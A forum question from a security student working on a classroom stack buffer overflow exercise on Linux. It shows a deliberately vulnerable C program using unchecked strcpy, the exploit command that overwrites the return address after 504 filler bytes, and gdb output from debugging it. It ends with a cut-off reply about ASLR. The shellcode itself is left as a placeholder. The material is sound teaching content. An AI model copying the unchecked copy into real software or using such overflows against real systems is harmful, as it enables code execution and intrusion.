I'm taking a class on security. I have this C code that I have to exploit on a linux system.
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[500];
    /* No length check: an argv[1] longer than 499 bytes overflows buffer */
    strcpy(buffer, argv[1]);
    return 0;
}
Using gdb, I have discovered that I must overwrite the return address after 504 arbitrary hex values.
I have taken some shell code and placed it in an environmental variable.
export scode=$"*shell code here*"
Then, I made a small C program to output the address of the variable.
#include <stdio.h>
#include <stdlib.h>   /* getenv */

int main(){
    /* Prints the pointer returned by getenv; "%#x" expects an unsigned int, not a pointer */
    printf("%#x\n" , getenv("scode"));
    return 0;
}
It outputs the address to be 0xbfffde73
So I try to run the vulnerable program, placing the shellcode address after 504 "A"s.
./vuln `python -c 'print "\x41" * 504' + "\x73\xde\xff\xbf"`
I get a segmentation fault. So I dig a little deeper using gdb. It is correctly overwriting the eip register with the address supplied, but still segfaulting.
(gdb) info registers eip
eip 0xbfffde73 0xbfffde73
It was recommended that I look at what was actually at that address, and I found this:
(gdb) x/20x $eip
0xbfffde73: 0x785c3063 0x785c3338 0x785c6365 0x785c3130
0xbfffde83: 0x785c3838 0x785c3430 0x785c3432 0x785c3836
0xbfffde93: 0x785c3236 0x785c3136 0x785c3337 0x785c3836
0xbfffdea3: 0x785c3836 0x785c3236 0x785c3936 0x785c6536
0xbfffdeb3: 0x785c6632 0x785c3338 0x785c6365 0x785c3130
That doesn't appear to be the shellcode that I placed there. Is this what is causing the segmentation fault? How can I do this properly?
Also, this is the method that we are supposed to use, so I don't think that it's an issue with environmental variables not being executable.
Thanks in advance.
0xbfffde73 will be the same across multiple program runs, 2) the memory region storing scode will be executable. See also this question, paying attention to ASLR and "%p". – DCoder Apr 7 at 8:37